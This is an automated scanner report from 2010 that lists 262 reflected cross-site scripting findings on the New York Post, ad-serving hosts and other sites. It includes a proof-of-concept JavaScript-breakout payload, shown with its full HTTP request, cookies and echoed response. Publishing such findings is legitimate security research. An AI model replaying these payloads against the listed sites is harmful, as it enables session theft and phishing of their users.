Report generated by XSS.CX at Fri Nov 26 15:36:11 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [REST URL parameter 2]

1.2. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [REST URL parameter 3]

1.3. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]

1.4. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [REST URL parameter 2]

1.5. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [REST URL parameter 3]

1.6. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

1.7. http://digg.com/submit [REST URL parameter 1]

1.8. http://graph.facebook.com/100001833502192/picture/ [REST URL parameter 1]

1.9. http://graph.facebook.com/100001833502192/picture/ [REST URL parameter 2]

1.10. http://graph.facebook.com/1530270529/picture/ [REST URL parameter 1]

1.11. http://graph.facebook.com/1530270529/picture/ [REST URL parameter 2]

1.12. http://graph.facebook.com/21488703512/picture/ [REST URL parameter 1]

1.13. http://graph.facebook.com/21488703512/picture/ [REST URL parameter 2]

1.14. http://graph.facebook.com/23418060/picture/ [REST URL parameter 1]

1.15. http://graph.facebook.com/23418060/picture/ [REST URL parameter 2]

1.16. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 2]

1.17. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 3]

1.18. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]

1.19. http://nypost.newspaperdirect.com/epaper/helpandsupport.aspx [name of an arbitrarily supplied request parameter]

1.20. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [name of an arbitrarily supplied request parameter]

1.21. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [siteid parameter]

1.22. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

1.23. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [siteid parameter]

1.24. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]

1.25. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [siteid parameter]

1.26. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]

1.27. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [siteid parameter]

1.28. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

1.29. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [siteid parameter]

1.30. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [name of an arbitrarily supplied request parameter]

1.31. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [siteid parameter]

1.32. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [name of an arbitrarily supplied request parameter]

1.33. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [siteid parameter]

1.34. http://rt.sitebrand.com/main.php [callback parameter]

1.35. http://rt.sitebrand.com/main.php [cid parameter]

1.36. http://rt.sitebrand.com/main.php [sid parameter]

1.37. http://rt.sitebrand.com/main.php [sur parameter]

1.38. http://rt.sitebrand.com/main.php [ur parameter]

1.39. http://stats.nypost.com/cfb/scoreboards.asp [name of an arbitrarily supplied request parameter]

1.40. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]

1.41. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]

1.42. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]

1.43. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]

1.44. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 1]

1.45. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 1]

1.46. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 2]

1.47. http://usa.classifieds.nypost.com/seller/1357873/ [name of an arbitrarily supplied request parameter]

1.48. http://redcated/8GF/iview/273499083/direct/01/4055590 [REST URL parameter 4]

1.49. http://redcated/8GF/iview/273499083/direct/01/4055590 [click parameter]

1.50. http://redcated/8GF/iview/273499083/direct/01/4055590 [click parameter]

1.51. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]

1.52. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]

1.53. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]

1.54. http://redcated/8GF/iview/273499083/direct/01/4347559 [REST URL parameter 4]

1.55. http://redcated/8GF/iview/273499083/direct/01/4353325 [REST URL parameter 4]

1.56. http://redcated/8GF/iview/273499083/direct/01/4367731 [REST URL parameter 4]

1.57. http://www.addthis.com/bookmark.php [REST URL parameter 1]

1.58. http://www.addthis.com/bookmark.php [REST URL parameter 1]

1.59. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

1.60. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

1.61. http://www.addthis.com/bookmark.php [username parameter]

1.62. http://www.addthis.com/bookmark.php [v parameter]

1.63. http://www.addthis.com/help/api-spec [REST URL parameter 1]

1.64. http://www.addthis.com/help/api-spec [REST URL parameter 1]

1.65. http://www.addthis.com/help/api-spec [REST URL parameter 2]

1.66. http://www.adoutput.com/version2/hit_rm.cfm [type parameter]

1.67. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

1.68. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

1.69. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

1.70. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

1.71. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

1.72. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]

1.73. http://www.classifieds.nypost.com/housing/ [REST URL parameter 1]

1.74. http://www.classifieds.nypost.com/housing/ [REST URL parameter 1]

1.75. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]

1.76. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]

1.77. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]

1.78. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]

1.79. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]

1.80. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]

1.81. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]

1.82. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]

1.83. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]

1.84. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]

1.85. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 1]

1.86. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 1]

1.87. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 2]

1.88. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 2]

1.89. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]

1.90. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]

1.91. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]

1.92. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]

1.93. http://www.classifieds.nypost.com/info/privacy/ [REST URL parameter 1]

1.94. http://www.classifieds.nypost.com/info/privacy/ [REST URL parameter 1]

1.95. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]

1.96. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]

1.97. http://www.classifieds.nypost.com/info/safety/ [REST URL parameter 1]

1.98. http://www.classifieds.nypost.com/info/safety/ [REST URL parameter 1]

1.99. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]

1.100. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]

1.101. http://www.classifieds.nypost.com/info/terms/ [REST URL parameter 1]

1.102. http://www.classifieds.nypost.com/info/terms/ [REST URL parameter 1]

1.103. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]

1.104. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]

1.105. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]

1.106. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]

1.107. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]

1.108. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]

1.109. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]

1.110. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]

1.111. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 1]

1.112. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 1]

1.113. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 2]

1.114. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 2]

1.115. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]

1.116. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]

1.117. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]

1.118. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]

1.119. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]

1.120. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]

1.121. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]

1.122. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]

1.123. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]

1.124. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]

1.125. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]

1.126. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]

1.127. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]

1.128. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]

1.129. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]

1.130. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]

1.131. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]

1.132. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]

1.133. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 2]

1.134. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 3]

1.135. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 4]

1.136. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 5]

1.137. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 6]

1.138. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 2]

1.139. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 3]

1.140. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 4]

1.141. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 5]

1.142. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 6]

1.143. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 2]

1.144. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 3]

1.145. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 4]

1.146. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 5]

1.147. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 6]

1.148. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 2]

1.149. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 3]

1.150. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 4]

1.151. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 5]

1.152. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 6]

1.153. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 2]

1.154. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 3]

1.155. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 4]

1.156. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 5]

1.157. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 6]

1.158. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 2]

1.159. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 3]

1.160. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 4]

1.161. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 5]

1.162. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 6]

1.163. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]

1.164. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 1]

1.165. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 1]

1.166. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 2]

1.167. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 1]

1.168. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 1]

1.169. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 2]

1.170. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 2]

1.171. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]

1.172. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]

1.173. http://www.oodle.com/pro/register/ [REST URL parameter 1]

1.174. http://www.oodle.com/pro/register/ [REST URL parameter 1]

1.175. http://www.oodle.com/pro/register/ [REST URL parameter 2]

1.176. http://www.oodle.com/pro/register/ [REST URL parameter 2]

1.177. http://www.overstock.com/Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html [name of an arbitrarily supplied request parameter]

1.178. http://www.overstock.com/Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html [name of an arbitrarily supplied request parameter]

1.179. http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html [name of an arbitrarily supplied request parameter]

1.180. http://www.pressdisplay.com/pressdisplay/helpandsupport.aspx [name of an arbitrarily supplied request parameter]

1.181. http://www.rentalhomesplus.com/search/oasis.dll [name of an arbitrarily supplied request parameter]

1.182. http://www.rentalhomesplus.com/search/oasis.dll [name of an arbitrarily supplied request parameter]

1.183. http://www.rentalhomesplus.com/search/oasis.dll [partner parameter]

1.184. http://www.rentalhomesplus.com/search/oasis.dll [partner parameter]

1.185. http://www.sitebrand.com/ [name of an arbitrarily supplied request parameter]

1.186. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 1]

1.187. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 2]

1.188. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]

1.189. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 4]

1.190. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 1]

1.191. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 2]

1.192. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 3]

1.193. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 4]

1.194. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 1]

1.195. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 2]

1.196. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 3]

1.197. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 4]

1.198. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 5]

1.199. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 1]

1.200. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 2]

1.201. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 3]

1.202. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 4]

1.203. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 5]

1.204. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 1]

1.205. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 2]

1.206. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 3]

1.207. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 4]

1.208. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 5]

1.209. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 1]

1.210. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 2]

1.211. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 3]

1.212. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 4]

1.213. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 5]

1.214. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 1]

1.215. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 2]

1.216. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 3]

1.217. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 4]

1.218. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 5]

1.219. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 1]

1.220. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 2]

1.221. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 3]

1.222. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 4]

1.223. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 5]

1.224. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 1]

1.225. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 2]

1.226. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 3]

1.227. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 4]

1.228. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 1]

1.229. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 2]

1.230. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 3]

1.231. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 4]

1.232. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 5]

1.233. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 1]

1.234. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 2]

1.235. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 3]

1.236. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 4]

1.237. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

1.238. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

1.239. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

1.240. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

1.241. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 1]

1.242. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 2]

1.243. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 3]

1.244. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 4]

1.245. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 1]

1.246. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 2]

1.247. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 3]

1.248. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 4]

1.249. http://www.sitebrand.com/xmlrpc.php [REST URL parameter 1]

1.250. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [Referer HTTP header]

1.251. https://secure.nypost.com/homedelivery/signup.htm [Referer HTTP header]

1.252. https://webid2.gs.com/cgi-bin/10kw/login.cgi [Referer HTTP header]

1.253. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.254. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.255. http://www.adoutput.com/version2/hit_rm.cfm [User-Agent HTTP header]

1.256. http://www.mysite.com/x/y/MyPage.asp [Referer HTTP header]

1.257. http://www.quantcast.com/p-e4QUTcIS3_f12 [Referer HTTP header]

1.258. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [cli cookie]

1.259. http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold [meld_sess cookie]

1.260. http://www.indeed.com/pagead/clk [atk parameter]

1.261. http://www.indeed.com/pagead/clk [name of an arbitrarily supplied request parameter]

1.262. http://www.indeed.com/pagead/clk [p parameter]



1. Cross-site scripting (reflected)
There are 262 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77bf'-alert(1)-'ceefda2404d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_postd77bf'-alert(1)-'ceefda2404d/tier2_082410 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Date: Fri, 26 Nov 2010 20:42:17 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_postd77bf'-alert(1)-'ceefda2404d/tier2_082410;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
